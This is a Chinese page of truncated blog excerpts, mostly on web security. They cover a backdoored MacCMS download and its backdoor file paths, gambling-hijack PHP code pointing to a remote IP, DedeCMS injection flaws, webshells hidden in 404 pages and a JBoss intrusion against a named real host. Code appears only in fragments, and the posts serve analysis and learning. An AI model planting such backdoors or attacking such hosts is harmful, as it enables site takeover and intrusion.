经验证:www.maccmsv10应该是个山寨站 -------------------- 前言 苹果CMS是国内优秀的开源PHP建站系统,擅长电影程序影视系统这一块,在主流建站系统中特色鲜明,以灵活.小巧.兼容性好.负载强等优点而深受许多站长的喜爱.... 好吧,我还是直说吧,了解该cms的人都知道,很多huangwang喜欢用这套cms.而我国马上七十周年了,作为祖国的花骨朵儿.党未来的接班人,我觉得我有必要为祖国做一些力所能及的事情,于是决定审计下该套系统然后xxoo,结果没发现高危漏洞倒…

本篇将主要讲解使用过程中普遍遇到的“问题”,这些问题并非是BUG,通常是需要我们自己去注意的一些点.(会结合用户反馈持续补充)http://www.maccms.com/doc/v10/faq.html 快速安装 获得 苹果CMS 后,将其完整地部署到你的网站目录,然后访问网站,即可自动跳转到安装页面install.php. 输入事先准备好的mysql数据库账户密码,即可一键安装. 常见疑问 JavaScript 1,由于采用最新的TP框架,所以php版本建议5.6以上,上传文件时需要开启fil…

该复现参考网络中的文章,该漏洞复现仅仅是为了学习交流,严禁非法使用!!!! Maccms官网:http://www.maccms.cn/ Maccms网站基于PHP+MYSQL的系统,易用性.功能良好等优点,用途范围广. (下载的此文件带有后门,网站也跟官网的一样...)Maccms下载地址:http://www.maccmsv10.com/ 1.下载好了之后,解压出来,后门文件存在于 后门文件:extend/Qcloud/Sms/Sms.php 后门文件:extend/upyun/src/Up…

(该文参考网络他人资料,仅为学习,不许用于非法用途) 一.环境 攻击者  : Kali Linux 被攻击者 :Windows Maccms 网站基于php+mysql 的系统,易用性.功能良好等优点,用途范围广 打开源码,maccms10\extend\Qcloud\Sms\Sms.php maccms10\extend\upyun\src\Upyun\Api\Format.php 查看该后门源码: <?php error_reporting(E_ERROR); @ini_set('displ…

Microsoft Azure Web Sites应用与实践 系列: [1]—— 打造你的第一个Microsoft Azure Website [2]—— 通过本地IIS 远程管理Microsoft Azure Web Site [3]—— 通过Visual Studio Online在线编辑Microsoft Azure 网站 [4]—— Microsoft Azure网站的“后门” Microsoft Azure网站的“后门” 从我们之前的博文可以看到,对Microsoft Azure 网站…

起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit();error_reporting(); define('u_b','/'); define('s_u','http:// 107.182.228.74/'); define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|y…

catalog . 安装及使用方式 . 检查DEDECMS是否为最新版本 . 检查默认安装(install)目录是否存在 . 检查默认后台目录(dede)是否存在 . 检查DedeCMS会员中心是否关闭 . 检查是否存在高风险的若密码账户 . 后台友情链接xss漏洞 . /plus/search.php SQL注入漏洞 . /plus/feedback.php SQL注入漏洞 . /plus/feedback_ajax.php SQL注入或XSS漏洞漏洞 . /include/dedesql.c…

这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用404页面隐藏PHP小马 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body&…

1.目标站点 http://125.69.112.239/login.jsp 2.简单测试 发现是jboss,HEAD请求头绕过失败,猜测弱口令失败,发现没有删除 http://125.69.112.239/invoker/JMXInvokerServlet 这个是jboss的另一个漏洞了. 3.大家都懂这里简单分析一下 Jboss在默认安装的时候,会安装http-invoker.sar站点,其web.xml配置如下: 可知当请求invoker/JMXInvokerServlet或invoker…

因为希望有统一的地图解决方案,就是PC端,移动端的数据一致,看到ArcGIS的最新发布,感兴趣的可以围观. 链接:http://blogs.esri.com/esri/arcgis/2013/09/03/maps-app-android-released-on-github/ Github上发布的地图应用程序的android 由  丹·奥尼尔  于  2013年9月3日 1 81 84 开发者峰会在过去的这个春天,我们推出了一种功能完全内置的移动地图应用程序上ArcGIS的运行SDK为Andro…